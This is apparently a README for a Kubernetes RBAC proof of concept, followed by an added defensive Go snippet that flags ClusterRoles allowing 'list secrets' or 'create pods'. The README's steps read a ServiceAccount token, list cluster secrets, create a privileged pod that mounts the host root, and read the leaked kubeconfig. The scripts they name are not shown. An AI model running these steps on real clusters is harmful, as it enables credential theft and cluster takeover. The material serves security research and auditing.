HouqiyuA/k8s-rbac-poc

  1. Get the token of a ServiceAccount with excessive privileges:

```bash
# If you're in the pod
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# If you are on the node
# Replace <serviceaccount-token> with the token name of the ServiceAccount with excessive privileges
kubectl describe secret <serviceaccount-token>
```

  2. Example of combining the list secrets and create pods permissions to take over the cluster

Note: Before running the Go code, fill in the values it needs, such as the token and host.

```bash
# List the secrets of the entire cluster and obtain a token with create pods privileges
go run listSecret.go
# Use this token to create a privileged container that mounts the root directory and sets a taint toleration for the master node, leaking the kubeconfig configuration file
go run createPod.go
# Access this privileged container
kubectl exec -it nginx-pod-mount2 -n default -- bash
# View the leaked kubeconfig file
cat /host/home/ubunt/.kube/config
```

IMPORTANT NOTICE: This program (or code) is intended for research and study purposes only. Its use for any illegal activity, invasion of privacy or violation of the Terms of Service is prohibited. The author is not responsible for the consequences of any misuse of this project.
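
An added example, not part of this repository: a defender-side check for the two grants the steps above rely on. It reads ClusterRole JSON in the shape printed by `kubectl get clusterroles -o json` and reports roles that allow `list` on `secrets` or `create` on `pods`, counting the RBAC wildcard `*`. The role names and the `Audit` and `has` helpers are assumptions made for illustration, and the sample input is constructed.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// rule holds the PolicyRule fields read here; JSON keys match case-insensitively.
type rule struct{ APIGroups, Resources, Verbs []string }
// Constructed sample in the shape of `kubectl get clusterroles -o json` (assumed role names).
const sampleRoles = `{"items":[{"metadata":{"name":"metrics-reader"},"rules":[{"apiGroups":[""],"resources":["pods"],"verbs":["get","list"]}]},
 {"metadata":{"name":"backup-agent"},"rules":[{"apiGroups":[""],"resources":["secrets"],"verbs":["list"]}]},
 {"metadata":{"name":"ci-deployer"},"rules":[{"apiGroups":["*"],"resources":["*"],"verbs":["create"]}]}]}`

// has reports whether list contains want or the RBAC wildcard "*".
func has(list []string, want string) bool {
	for _, v := range list {
		if v == want || v == "*" {
			return true
		}
	}
	return false
}

// Audit maps each role name to the risky core-group ("") grants it holds.
func Audit(data []byte) (map[string][]string, error) {
	var rl struct {
		Items []struct {
			Metadata struct{ Name string }
			Rules    []rule
		}
	}
	if err := json.Unmarshal(data, &rl); err != nil {
		return nil, err
	}
	out := map[string][]string{}
	for _, it := range rl.Items {
		for _, c := range [][2]string{{"list", "secrets"}, {"create", "pods"}} {
			for _, r := range it.Rules {
				if has(r.APIGroups, "") && has(r.Verbs, c[0]) && has(r.Resources, c[1]) {
					out[it.Metadata.Name] = append(out[it.Metadata.Name], c[0]+" "+c[1])
					break // one finding per grant, even if several rules allow it
				}
			}
		}
	}
	return out, nil
}

func main() { fmt.Println(Audit([]byte(sampleRoles))) }
```

Namespaced Roles and the bindings that attach these roles to ServiceAccounts need the same review; this block covers ClusterRole rules only.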
